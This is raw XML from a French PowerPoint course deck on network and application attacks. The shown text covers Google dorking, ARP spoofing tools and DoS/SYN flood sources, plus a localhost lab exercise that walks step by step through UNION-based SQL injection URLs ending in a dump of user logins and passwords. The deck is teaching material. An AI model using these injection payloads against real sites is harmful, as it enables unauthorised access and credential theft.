              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:"index of" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inurl:htm-inurl:html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cisco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l’extention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souhaitez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> , .txt, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>avi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ….) et avec le mot de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>recherche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>souhaité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, commenter le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>résultat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>obtenu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Exemple d'outil d'arp spoofing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>arp-sk (unix) winarp-sk (windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>http://www.arp-sk.org </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>WinArpSpoof http://nextsecurity.net</a:t>
            </a:r>
            <a:endParaRPr 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FC60121-9388-4D31-BE1B-BA34F476BF2E}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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5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1128713"/>
            <a:ext cx="77247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3528" y="260648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Exercice d’application N°1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23528" y="1124744"/>
            <a:ext cx="7560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1- Installer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Wamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> server, lancer l’application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>wamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> et arrêter en cas de besoin de serveur IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>2-  Récupérer l’application « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>appListPersonel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> » développée en PHP et la mettre dans le dossier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>wamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>/www</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>3- Créer sous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>PHPMyAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> une base de donnée appeler boutique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>4- Importation le script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> et l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>é</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>xecuter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> dans boutique 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5- Apres extraction de l’application en PHP  dans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>wamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>/www faire les </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> changement de configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>BaseDonnee.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>  		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>", "", "boutique");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81" y="54868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//test si </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>http://localhost/appListPersonel/index.php?id=1 ‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>//lire nombre des colonne</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>http://localhost/appListPersonel/index.php?id=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> by 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>//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mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>http://localhost/appListPersonel/index.php?id=1 union all select 1,convert(@@version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> latin1),3,4,5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>//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database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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>http://localhost/appListPersonel/index.php?id=1 union all select 1,version(),DATABASE(),4,5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>//listes des tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>http://localhost/appListPersonel/index.php?id=1 union all select 1,table_name,3,4,5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information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> TABLE_SCHEMA = 'boutique‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>// liste des colonne de la table utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>http://localhost/appListPersonel/index.php?id=1 union all select 1,table_name,COLUMN_NAME,4,5 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = 'boutique' AND TABLE_NAME ='utilisateur';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>http://localhost/appListPersonel/index.php?id=1 union all select 1,login,pass ,4,5  FROM utilisateur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79512" y="18864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Apres avoir lancer l’application en PHP lancer les attaques suivantes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81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4F8823B-E0EC-461C-9EEE-DCCDEBA3EE4D}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Déni de service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 dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>2 types :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Crash d’un système ou d’un réseau;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Rendre un service ou un élément non disponible, inutilisable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Effacer un programme détruire ou neutraliser une composante du système</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Endommager un disque dur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Causer la noyade (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>flooding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>) du système ou du réseau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct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724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C506CDF-0F4D-4D1A-B543-40F0FF64FAB2}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-F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smtClean="0"/>
              <a:t>Exemples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fr-FR" sz="2600" smtClean="0"/>
              <a:t>Attaque TCP SYN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Toute la mémoire est consommée par les connexions TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Code source :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Synflood.c : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.hackersclub.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Synful.c et Synk4.c Synflooders : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.anticode.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" sz="2200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319714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2776</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran (4:3)</PresentationFormat>
  <Paragraphs>500</Paragraphs>
  <Slides>72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72</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="73" baseType="lpstr">
      <vt:lpstr>Thème Office</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Types d’attaques</vt:lpstr>
      <vt:lpstr>Accès non autorisé</vt:lpstr>
      <vt:lpstr>Usurpation d’identité</vt:lpstr>
      <vt:lpstr>Usurpation d’identité</vt:lpstr>
      <vt:lpstr>Arp spoofing </vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Déni de service</vt:lpstr>
      <vt:lpstr>Exemples</vt:lpstr>
      <vt:lpstr>Ping de la mort</vt:lpstr>
      <vt:lpstr>ssping</vt:lpstr>
      <vt:lpstr>Land</vt:lpstr>
      <vt:lpstr>SMURF</vt:lpstr>
      <vt:lpstr>CPU HOG</vt:lpstr>
      <vt:lpstr>CPU HOG</vt:lpstr>
      <vt:lpstr>CPU HOG</vt:lpstr>
      <vt:lpstr>Jolt2</vt:lpstr>
      <vt:lpstr>Jolt2</vt:lpstr>
      <vt:lpstr>Jolt2</vt:lpstr>
      <vt:lpstr>Jolt2</vt:lpstr>
      <vt:lpstr>Bubonic</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Outils DOS</vt:lpstr>
      <vt:lpstr>DDOS</vt:lpstr>
      <vt:lpstr>Outils DDOS</vt:lpstr>
      <vt:lpstr>Comment se protéger</vt:lpstr>
      <vt:lpstr>Vulnérabilités applicatives</vt:lpstr>
      <vt:lpstr>Attaques par débordement de tampon</vt:lpstr>
      <vt:lpstr>Buffer over flow</vt:lpstr>
      <vt:lpstr>Buffer over flow</vt:lpstr>
      <vt:lpstr>Gestion des piles sous x86</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Shell code</vt:lpstr>
      <vt:lpstr>Buffer over flow</vt:lpstr>
      <vt:lpstr>Buffer over flow</vt:lpstr>
      <vt:lpstr>BOF</vt:lpstr>
      <vt:lpstr>Exemples</vt:lpstr>
      <vt:lpstr>Ingénierie sociale</vt:lpstr>
      <vt:lpstr>Motivation des attaquants</vt:lpstr>
      <vt:lpstr>Motivation des attaquants</vt:lpstr>
      <vt:lpstr>Acteurs</vt:lpstr>
      <vt:lpstr>Acteurs</vt:lpstr>
      <vt:lpstr>Acteurs</vt:lpstr>
      <vt:lpstr>D’autres attaques</vt:lpstr>
      <vt:lpstr>D’autres attaques</vt:lpstr>
      <vt:lpstr>Virus</vt:lpstr>
      <vt:lpstr>Virus</vt:lpstr>
      <vt:lpstr>D’autres attaques</vt:lpstr>
      <vt:lpstr>Les scripts et applets dans le HTML</vt:lpstr>
      <vt:lpstr>Les "backdoors", "trojans" et assimilés</vt:lpstr>
      <vt:lpstr>Porte dérobée</vt:lpstr>
      <vt:lpstr>Porte dérobée</vt:lpstr>
      <vt:lpstr>Spyware</vt:lpstr>
      <vt:lpstr>Spyware</vt:lpstr>
      <vt:lpstr>Les défauts logiciels</vt:lpstr>
      <vt:lpstr>Bombe, Ver</vt:lpstr>
      <vt:lpstr>Exemple</vt:lpstr>
      <vt:lpstr>Ver Sasser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20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-09T22:03:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-10T00:48:56Z</dcterms:modified>
</cp:coreProperties>
</file>